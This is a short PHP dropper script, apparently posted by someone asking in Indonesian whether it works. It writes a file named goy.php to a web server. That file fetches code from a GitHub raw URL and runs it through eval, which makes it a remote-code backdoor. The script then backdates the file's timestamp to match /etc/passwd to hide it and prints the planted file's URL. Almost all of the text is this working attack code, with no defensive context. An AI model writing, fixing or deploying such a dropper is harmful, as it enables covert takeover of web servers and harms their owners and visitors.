$content = '<?php $Url = "https://raw.githubusercontent.com/0xF102400/peler/refs/heads/main/a.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo eval("?>".$output); ?>';

$file_paths = [
    "./goy.php"
];

foreach ($file_paths as $file_path) {
    if (!is_dir(dirname($file_path))) {
        mkdir(dirname($file_path), 0777, true);
    }

    file_put_contents($file_path, $content);
	touch($file_path, filemtime('/etc/passwd'));
}

echo "File Has Been Created<br><br>";

foreach ($file_paths as $file_path) {
    echo "https://" . $_SERVER['HTTP_HOST'] . str_replace("./", "/", $file_path) . "<br>";
}

?>


apakah bisa
